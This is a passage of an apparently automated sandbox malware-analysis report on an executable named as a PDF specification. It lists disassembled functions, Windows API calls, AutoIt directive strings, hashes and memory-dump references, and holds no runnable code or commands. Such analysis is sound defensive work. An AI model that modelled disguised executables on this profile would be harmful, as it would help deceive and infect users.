                              • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                              • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                              Function 0045EA0F Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 325timeCOMMON
                              Download Yara Rule
                              APIs
                              • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                              • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                              • VariantClear.OLEAUT32 ref: 0045EA6D
                              • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                              • __swprintf.LIBCMT ref: 0045EC33
                              • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                              Strings
                              • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Variant$InitTime$ClearCopySystem__swprintf
                              • String ID: %4d%02d%02d%02d%02d%02d
                              • API String ID: 2441338619-1568723262
                              • Opcode ID: d299e47af636e42a971ad6c2535cd90f83c52cb5e81e18151f02860a5cbf0826
                              • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                              • Opcode Fuzzy Hash: d299e47af636e42a971ad6c2535cd90f83c52cb5e81e18151f02860a5cbf0826
                              • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                              Function 004091B0 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 324sleepCOMMON
                              Download Yara Rule
                              APIs
                              • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                              • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                              • Sleep.KERNEL32(0000000A), ref: 0042C67F
                              • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                              • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Interlocked$DecrementIncrement$Sleep
                              • String ID: @COM_EVENTOBJ
                              • API String ID: 327565842-2228938565
                              • Opcode ID: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                              • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                              • Opcode Fuzzy Hash: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                              • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                              Function 0047025C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 288COMMON
                              Download Yara Rule
                              APIs
                              • VariantClear.OLEAUT32(?), ref: 0047031B
                              • VariantClear.OLEAUT32(?), ref: 0047044F
                              • VariantInit.OLEAUT32(?), ref: 004704A3
                              • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                              • VariantClear.OLEAUT32(?), ref: 00470516
                                • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                              • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                              • VariantClear.OLEAUT32(00000000), ref: 0047060D
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Variant$Clear$Copy$CallDispFuncInit
                              • String ID: H
                              • API String ID: 3613100350-2852464175
                              • Opcode ID: 6648f1ef670bc3d986ccb21afe65586efb25ba61d746718973159b73a8bf9b89
                              • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                              • Opcode Fuzzy Hash: 6648f1ef670bc3d986ccb21afe65586efb25ba61d746718973159b73a8bf9b89
                              • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                              Function 00401CB0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 240COMMON
                              Download Yara Rule
                              APIs
                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                              • DestroyWindow.USER32(?), ref: 00426F50
                              • UnregisterHotKey.USER32(?), ref: 00426F77
                              • FreeLibrary.KERNEL32(?), ref: 0042701F
                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                              • String ID: close all
                              • API String ID: 4174999648-3243417748
                              • Opcode ID: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                              • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                              • Opcode Fuzzy Hash: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                              • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                              Function 0044AA86 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174networkCOMMON
                              Download Yara Rule
                              APIs
                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                              • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                              • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                              • String ID:
                              • API String ID: 1291720006-3916222277
                              • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                              • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                              • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                              • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                              Function 0045FBAC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 147windowCOMMON
                              Download Yara Rule
                              APIs
                              • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                              • IsMenu.USER32(?), ref: 0045FC5F
                              • CreatePopupMenu.USER32 ref: 0045FC97
                              • GetMenuItemCount.USER32(?), ref: 0045FCFD
                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Menu$Item$CountCreateInfoInsertPopup
                              • String ID: 0$2
                              • API String ID: 93392585-3793063076
                              • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                              • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                              • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                              • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                              Function 004352C2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 114COMMON
                              Download Yara Rule
                              APIs
                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                              • VariantClear.OLEAUT32(?), ref: 00435320
                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                              • VariantClear.OLEAUT32(?), ref: 004353B3
                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                              • String ID: crts
                              • API String ID: 586820018-3724388283
                              • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                              • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                              • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                              • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                              Function 0044BBD2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 105filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Product Data Specifications_PDF.exe,0040F545,C:\Users\user\Desktop\Product Data Specifications_PDF.exe,004A90E8,C:\Users\user\Desktop\Product Data Specifications_PDF.exe,?,0040F545), ref: 0041013C
                              • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                              • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                              • _wcscat.LIBCMT ref: 0044BCAF
                              • _wcslen.LIBCMT ref: 0044BCBB
                              • _wcslen.LIBCMT ref: 0044BCD1
                              • SHFileOperationW.SHELL32(?), ref: 0044BD17
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                              • String ID: \*.*
                              • API String ID: 2326526234-1173974218
                              • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                              • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                              • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                              • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                              Function 004335CD Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                              • _wcslen.LIBCMT ref: 004335F2
                              • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                              • GetLastError.KERNEL32 ref: 0043362B
                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                              • _wcsrchr.LIBCMT ref: 00433666
                                • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                              • String ID: \
                              • API String ID: 321622961-2967466578
                              • Opcode ID: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                              • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                              • Opcode Fuzzy Hash: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                              • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                              Function 0044C7DD Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 88COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: __wcsnicmp
                              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                              • API String ID: 1038674560-2734436370
                              • Opcode ID: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                              • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                              • Opcode Fuzzy Hash: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                              • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                              Function 0041793C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                              • __lock.LIBCMT ref: 00417981
                                • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                              • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                              • __lock.LIBCMT ref: 004179A2
                              • ___addlocaleref.LIBCMT ref: 004179C0
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                              • String ID: KERNEL32.DLL$pI
                              • API String ID: 637971194-197072765
                              • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                              • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                              • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                              • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                              Function 0046822A Relevance: 12.3, APIs: 8, Instructions: 267COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _memmove$_malloc
                              • String ID:
                              • API String ID: 1938898002-0
                              • Opcode ID: d043fc78578686455e84cdb9b2e40380f0db7399645aa8fde2fdf5317b917d0c
                              • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                              • Opcode Fuzzy Hash: d043fc78578686455e84cdb9b2e40380f0db7399645aa8fde2fdf5317b917d0c
                              • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                              Function 0044B489 Relevance: 12.1, APIs: 8, Instructions: 102fileCOMMON
                              Download Yara Rule
                              APIs
                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                              • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                              • _memmove.LIBCMT ref: 0044B555
                              • _memmove.LIBCMT ref: 0044B578
                              • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                              • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                              • String ID:
                              • API String ID: 2737351978-0
                              • Opcode ID: 773decce50c93e3f36a11239f8f172856a87eb87626e5f0a1a8c5d5fb2b898c5
                              • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                              • Opcode Fuzzy Hash: 773decce50c93e3f36a11239f8f172856a87eb87626e5f0a1a8c5d5fb2b898c5
                              • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                              Function 00415214 Relevance: 12.1, APIs: 8, Instructions: 66threadCOMMON
                              Download Yara Rule
                              APIs
                              • ___set_flsgetvalue.LIBCMT ref: 0041523A
                              • __calloc_crt.LIBCMT ref: 00415246
                              • __getptd.LIBCMT ref: 00415253
                              • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                              • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                              • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                              • _free.LIBCMT ref: 0041529E
                              • __dosmaperr.LIBCMT ref: 004152A9
                                • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
